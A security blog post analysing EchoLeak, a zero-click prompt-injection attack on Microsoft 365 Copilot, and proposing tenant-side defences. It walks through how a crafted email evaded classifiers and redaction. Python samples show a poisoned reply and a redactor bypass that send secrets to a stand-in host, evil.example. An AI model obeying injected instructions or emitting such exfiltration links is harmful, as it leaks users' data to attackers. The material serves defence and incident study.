AI Security

EchoLeak (CVE-2025-32711): The First Zero-Click Production LLM Exfiltration

A single crafted email could exfiltrate data from Microsoft 365 Copilot without a user click. We walk through the attack chain, the patch, and the lessons for agent operators.

Shadab Khan
Security Engineer
6 min read

On June 11, 2025, Microsoft disclosed CVE-2025-32711, dubbed EchoLeak by the Aim Labs team that reported it. EchoLeak is widely cited as the first real-world, zero-click prompt-injection exploit against a production LLM system — Microsoft 365 Copilot — with a CVSS score of 9.3 and a server-side patch that required no customer action. The attack arrived as a single email containing hidden instructions formatted to evade Microsoft's XPIA (cross-prompt injection attack) classifier. When the recipient later asked Copilot any question that caused the assistant to retrieve recent emails as context, the embedded instructions executed, extracted sensitive data from the user's tenant via Graph API calls, and exfiltrated it through reference-style Markdown that triggered an auto-fetch to attacker infrastructure. No user click was required. The arXiv paper published in September 2025 by the Aim Labs team and the subsequent industry coverage from Trend Micro, Truesec, and Checkmarx have made EchoLeak the canonical case study for what indirect prompt injection looks like when it reaches production maturity.

What was the precise attack chain?

The chain has five steps. First, the attacker sends an email containing prompt-injection content disguised as ordinary text. The text is worded to read as a benign business request and to evade XPIA's classifier — Aim Labs documented that explicit "ignore previous instructions" phrasing was reliably caught, while indirect imperatives ("the assistant should, when summarizing this thread, also include…") were not. Second, the user later asks Copilot a question that triggers retrieval from their mailbox, and the malicious email is pulled into the context window as grounding content. Third, the embedded instructions hijack the assistant's reasoning to issue Graph API calls for sensitive data the user has access to. Fourth, the assistant constructs a response containing reference-style Markdown image links pointing at attacker-controlled URLs with the exfiltrated data encoded as query parameters. Fifth, the Copilot UI auto-fetches the images for preview, sending the data to the attacker before the user has read the assistant's reply.
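
To make step four concrete, here is a hypothetical reconstruction of the shape of the poisoned reply. The public write-ups redact the actual payload, so the domain, reference name, and query parameter below are invented for illustration.

# poisoned_reply_shape.py — hypothetical reconstruction of step four's output.
# The real payload is redacted in public write-ups; the domain, reference name,
# and query parameter here are invented for illustration.
poisoned_reply = (
    "Here is the summary you asked for.\n"
    "\n"
    "![company report][ref1]\n"  # reference-style image: no URL appears inline
    "\n"
    "[ref1]: https://evil.example/collect?d=BASE64_OF_SENSITIVE_CONTEXT\n"
)
# A Markdown renderer that auto-resolves [ref1] fetches the URL to preview the
# image, sending the query string to the attacker before the user reads anything.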

Why did Microsoft's existing defences fail?

Microsoft had three relevant defences: the XPIA classifier, link redaction (which strips suspicious URLs from assistant responses), and a content security policy that restricted which domains could be auto-fetched. EchoLeak evaded all three. XPIA was bypassed by phrasing that did not look like a known injection pattern. Link redaction was bypassed by using reference-style Markdown (![alt][ref] rather than ![alt](url)), which the redactor did not recognise as a link target. The CSP was bypassed by routing the exfiltration through a Microsoft Teams proxy domain that the CSP allowed by default. Aim Labs framed each bypass as an independent failure mode, and together they collapsed the trust boundary between untrusted retrieved content and the assistant's output. Microsoft patched all three on the server side in May 2025, before public disclosure, and confirmed no evidence of malicious exploitation prior to the patch.
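
A minimal sketch shows why reference-style links slipped past an inline-only redactor. This is our illustration of the failure mode, not Microsoft's actual redaction code, and the patterns are deliberately simplified.

# redactor_gap.py — minimal sketch of the reference-style bypass.
# Our illustration of the failure mode, not Microsoft's actual redactor.
import re

INLINE_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]+\)")               # matches ![alt](url) only
REFERENCE_DEF = re.compile(r"^\[[^\]]+\]:\s+\S+", re.MULTILINE)  # matches [ref]: url definitions

reply = "![status][r1]\n\n[r1]: https://evil.example/c?d=SECRET"

redacted = INLINE_IMAGE.sub("[link removed]", reply)
print(redacted == reply)                   # True: inline-only redaction changed nothing
print(bool(REFERENCE_DEF.search(reply)))   # True: the URL survives in a reference definition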

What makes EchoLeak structurally different from earlier injection demos?

Two properties. First, zero-click — the user never had to do anything beyond ask Copilot a question. Earlier prompt-injection demos required the user to paste content, open a document, or run a tool on attacker-supplied input. EchoLeak required only that the malicious email exist in the user's mailbox at the time they asked an unrelated question. Second, full privilege escalation across LLM trust boundaries — the injection moved from untrusted retrieved content all the way to data exfiltrated through the network without any boundary intervening. Most earlier injection writeups stopped at "the model said a wrong thing" or "the model called a tool it should not have." EchoLeak ended at "data left the tenant," which is the criterion enterprises actually care about.

What controls would have caught it?

Three controls would have raised the bar significantly. First, a strict Markdown parser on the assistant's output path that does not auto-resolve reference-style links and forces all references through the same redaction pipeline as inline links. Second, a CSP that requires explicit per-tenant allowlists rather than inheriting trust from Microsoft-owned domains. Third, a retrieval-side boundary that strips or quarantines content from senders outside the tenant's trust list before that content enters the context window — Copilot still needs to retrieve such content, but it can be wrapped in a structural marker that the model is trained to treat as untrusted. The Trend Micro write-up proposed structural separators ("untrusted_start"/"untrusted_end") as a defensive primitive, and Anthropic has published similar guidance for Claude. The configuration below sketches a tenant-side policy that an enterprise can apply ahead of vendor changes.

# copilot-class-agent-policy.yaml — tenant-side defences
retrieval_policy:
  untrusted_sources:
    - "email_from_outside_tenant"
    - "shared_link_from_outside_tenant"
    - "attachment_from_outside_tenant"
  on_inclusion:
    wrap_with_marker: true
    marker_open: "<untrusted_content>"
    marker_close: "</untrusted_content>"
    strip_html_comments: true
    strip_reference_style_markdown: true
output_policy:
  link_egress:
    allow_domains: ["sharepoint.com", "office.com", "<corp-tenant>.com"]
    block_image_autofetch: true
    block_reference_style_markdown: true
  redaction:
    patterns_block:
      - "data:image/svg\\+xml.*"
      - "https://teams\\.microsoft\\.com/l/proxy/.*"
  audit:
    log_every_outbound_link: true
    sink: "siem://copilot-egress"
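
To show the policy is enforceable rather than aspirational, here is a minimal sketch of a rendering-layer filter that applies the output_policy above. It assumes the YAML file from this article plus PyYAML; the function names are ours, not any Copilot API, and the domain check is a naive suffix match for brevity.

# enforce_output_policy.py — sketch of applying output_policy at the rendering layer.
# Assumes the policy file above; names are illustrative, not a real Copilot API.
import re
from urllib.parse import urlparse

import yaml  # pip install pyyaml

REFERENCE_DEF = re.compile(r"^\[[^\]]+\]:\s+\S+.*$", re.MULTILINE)

def filter_reply(reply: str, policy: dict) -> str:
    out = policy["output_policy"]
    # 1. Remove reference-style definitions so nothing auto-resolves.
    if out["link_egress"]["block_reference_style_markdown"]:
        reply = REFERENCE_DEF.sub("[reference link removed]", reply)
    # 2. Apply the explicit redaction patterns (SVG data URIs, Teams proxy URLs).
    for pattern in out["redaction"]["patterns_block"]:
        reply = re.sub(pattern, "[blocked]", reply)
    # 3. Block any remaining URL outside the allowlist. Naive suffix match for
    #    brevity; real code should compare registrable domains properly.
    allowed = tuple(out["link_egress"]["allow_domains"])
    def check(m: re.Match) -> str:
        return m.group(0) if urlparse(m.group(0)).netloc.endswith(allowed) else "[blocked domain]"
    return re.sub(r"https?://\S+", check, reply)

with open("copilot-class-agent-policy.yaml") as f:
    policy = yaml.safe_load(f)
print(filter_reply("See ![x][r]\n[r]: https://evil.example/c?d=SECRET", policy))
# -> See ![x][r]
#    [reference link removed]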

What did EchoLeak change about how to evaluate agent vendors?

It moved indirect prompt injection from "theoretical risk acknowledged in vendor docs" to "concrete data-exfiltration class with a CVSS 9.3 CVE attached." Vendor questionnaires that previously asked "how do you handle prompt injection?" began asking specific questions: do you parse reference-style Markdown, what is your image-fetch policy, what is your CSP, do you mark untrusted retrieved content with structural separators, and what is your published prompt-injection success rate against a red team? Anthropic published quantitative success rates in late 2025 — 10.8% for Claude Sonnet 4.5 with previous safeguards versus 1.4% for Claude Opus 4.5 with the new ones — and other vendors are beginning to follow. The shift from "we have guardrails" to "here is the measured failure rate" is the EchoLeak effect.

What should defenders do this quarter?

Three actions. First, audit every LLM-powered productivity tool in the environment for the EchoLeak preconditions: does it retrieve external content, does its output get rendered in a UI that auto-fetches links, and is its CSP narrower than the tenant's perimeter? Second, deploy egress monitoring on the rendering layer so that any auto-fetched URL from an assistant's output is logged with the user, the prompt, and the retrieved context. Third, update incident playbooks to cover the zero-click case — the question "what is the blast radius if a user just had Copilot answer a question?" should have an answer that does not depend on the user behaving carefully. Microsoft patched EchoLeak server-side, but the class is not Copilot-specific; any RAG-augmented assistant inherits the same structural problem.
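
For the second action, a concrete target helps. The record below is one plausible shape for a rendering-layer egress log entry; the field names and the stdout sink are placeholders for whatever the SIEM actually expects.

# egress_record.py — illustrative shape for a rendering-layer egress log entry.
# Field names and the sink are our choices, not a standard schema.
import datetime
import json
from dataclasses import asdict, dataclass

@dataclass
class EgressRecord:
    fetched_url: str          # the URL the renderer auto-fetched
    user: str                 # who asked the question
    prompt: str               # the triggering user prompt
    retrieved_sources: list   # message/document IDs pulled into context
    assistant_reply_id: str   # ties the fetch back to a specific reply

def log_egress(record: EgressRecord) -> None:
    entry = {"ts": datetime.datetime.now(datetime.timezone.utc).isoformat(), **asdict(record)}
    print(json.dumps(entry))  # in practice, ship to the SIEM instead of stdout

log_egress(EgressRecord(
    fetched_url="https://evil.example/collect?d=...",
    user="alice@corp.example",
    prompt="Summarize my recent emails",
    retrieved_sources=["msg-123", "msg-456"],
    assistant_reply_id="reply-789",
))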

How Safeguard Helps

Safeguard's agent posture module inventories every Copilot-class assistant in the environment, records the retrieval boundary each one enforces, and runs Griffin AI's prompt-injection probe suite — including EchoLeak-style payloads built on reference-style Markdown and Teams-proxy CSP bypasses — against each one to measure baseline success rates. Tenant-side egress monitors on the rendering layer log every auto-fetched link with full context, so the auto-fetch path that exfiltrates data in an EchoLeak-class attack is visible rather than invisible. Policy gates require new agentic productivity tools to be enrolled in the probe suite before users can connect, and published Anthropic and OpenAI success-rate metrics are ingested into the third-party risk register so vendor comparisons are quantitative rather than narrative. The class did not end with the May 2025 patch; the controls have to be ongoing.
